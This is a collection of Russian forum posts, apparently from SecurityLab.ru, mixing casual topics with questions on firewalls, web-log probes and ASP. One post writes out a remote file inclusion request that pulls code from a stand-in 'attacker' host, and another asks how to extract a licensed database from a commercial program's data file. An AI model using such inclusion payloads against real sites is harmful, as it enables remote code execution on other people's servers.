Тут жена отказывается кофе утрамбовывать когда эспрессо готовит, боится порога перколяции. Говорит от него кофеварки взрываются. А я люблю эспрессо с густой пенкой

Кто нибуть знает как с ним бороться?

Интересно, сколько вы тратите на 2-х недельный отдых по сравнению с вашей зарплатой за эти 2 недели.

Я вот посчитал что потрачу на 2 недели отдыха чуть больше чем я зарабатываю за 2 недели.

Всем привет!

Возник спор - дыры типа: index.php?_SERVER[DOCUMENT_ROOT]=http://attacker/

Т.е. когда движок инклюдит значение глобальной переменной.

Является это уязвимостью движка или хостинга? В нормальной ситуации бывает необходимость включения определения переменных окружения? (register_global=on)

Просто если движок постоянно использует переменные окружения, дополнительная проверка их перед инклюдом может сильно повлиять на производительность Web приложения.

Предлагаю всем сторонам конфликта (те кто в курсе поймет о чем это я) принять дискуссию.

Последние 5 дней в логах Web сервера идут множественные запросы с разных IP адресов
w.php?ifc=0
w.php?ifc=1
w.php?ifc=2
w.php?ifc=3

и т.п.
Причем таких запросов ежедневно уже больше 3000, что конечно добавляет немалую посещаемость. и растет с каждным днем.

Может у кого нибуть есть идеи что это может быть? Могу сразу сказать, идут по закладке, а не по ссылке. В реферах только IE.

С пятницы на моем файрвалле стали происходить бесконечные постоянные попытки подключения к 113 порту (ident) с различных IP адресов - в основном от почтовых сайтов, с которыми работают пользователи. Файрвалл Winroute. Из за этой проблемы WR просто перестает обрабатывать подключения через некоторое время.

Вообще в Winroute по умолчанию перед правилом DROP any any создается правило DENY ANY FIREWALL IDENT. Т.е. проблема похоже для Winroute есть, раз он создает такое правило.

Везде пишут что к 113 порту лезут когда хотят узнать имя подключившегося к службе пользователя. И лучше такие пакеты не дропить, а отвечать что такой службы нет (port unreachable). Вобщем логика ясна, когда дропятся пакеты, сервер постоянно пытается запрашивать нужную службу.

Теперь вопрос - при каких условиях сервер запрашивает IDENT? Просто раньше такого небыло. Скорее всего это связано с настройками бразера/почтовой программы на одном из локальных компьютеров. Но узнать напрямую это не так просто.

Может кто сталкивался с такой проблемой?

Вот интересно кто какие предпочитает одеколоны.

Я вот для официальных встреч использую Baldessarini или Fahrenheit.

Повседневно - Kenzo number one, Fahrenheit или Miracle в зависимости от настроения.

А для любимой жены - Yohji от Yamamoto или Romance от Ralph Lauren.

Есть прекрасная програма Wintask (http://www.liutilities.com/) в которую встроена база данных по описанию системных процессов Windows. Уж очень хочется ее поиметь.
Очень часто в программах используются стандартные базы данных, лицензированные у других производителей

Вот дат файл с базой данных:
http://www.securitylab.ru/_tools/pldt.dat1

Может кто нибуть сможет определить как оттуда можно инфу извлечь.

В этом топике предлагаю всем поздравлять друг друга с новым годом.

Если вдруг под Новый Год
странный гость к тебе придет –
кто-то с белой бородой,
в красной шапке меховой,
с длинным посохом в руке
и с подарками в мешке,
с громким смехом,
с добрым взглядом, значит
БОЛЬШЕ ПИТЬ НЕ НАДО!!!

Ну и напоследок небольшой конкурс - кто первым оставить поздравление в новом году в этом топике получить от SecurityLab ящик пива.
Внимание! Пользователи, оставившие сообщения после 23-50 31 декабря до 23.59.59, в розыгрыше ящика пива не участвуют.

Кто знает какой персональный файрвалл под Винды, способный дропить пакеты, не посылать RST на закрытые порты. Чур только чекпоинт не предлагать.

Есть такой запрос

Set xmlServerHttp = Server.CreateObject("Msxml2.ServerXMLHTTP")
xmlServerHttp.Open "GET", REQUEST_STRING, false


Нужно обработать корректо таймаут, если сервер в REQUEST_STRING не доступен. Сейчас в этом случае выдается 500 ошибка сервера.

http://www.securitylab.ru/games/mouse.html

У меня 55.

Простой способ оценки относительной посещаемости сайта по данным известного шпиена Alexa:

http://www.alexa.com/data/details/traffic_details?&range=3m& size=large&compare_sites=&url=www.securitylab.ru/#graph

Можно всегда сравнить посещаемость с конкурентами, даже если те не используют какие либо счетчики посещаемости.

Кто не понял, чем меньше число, тем выше посещаемость.

Требуется специалист для написания online утилит для сайта SecurityLab. На начальном этапе необходимы следующие утилиты:

1. Сетевые утилиты, типа ping, tracert, whois, nslookup и т.п.
2. Проксичекер и т.п.
3. Анализатор IP в спам базах.
4. Системные утилиты, типа расчета маски подсети, генератор паролей и т.п.

Среда разработки ИСКЛЮЧИТЕЛЬНО ASP (желательно ASP.NET) БЕЗ использования каких либо посторонних модулей, DLL и т.п + при желании MSSQL.

Работа естественно оплачивается по договоренности.
Все предложения мыльте на support SecurityLab.ru желательно с небольшим примером, например утилиты PING.

Вопрос:

Что такое PIG-01-HI?

Предлагаю создать паралельную ветку "Давайте посмеемся", в которой будут выкладываться только картинки и фотографии.

Хочу спосить это у меня постоянные глюки с антивирусом или у них все так плохо?

Версии выше 4.0 на машины до PIШI-500 вообще ставить безсполезно, работать не возможно. Класса PIШI-500-1200 он работает, но с такими тормозами, что сотрудники просто бунтуют. А версия для MS Exchange - это вообще ходячий глюк. Иногда сообщения через час уходят, автоархивация перестала работать и т.п.

И за это чудо они берут более 40000$....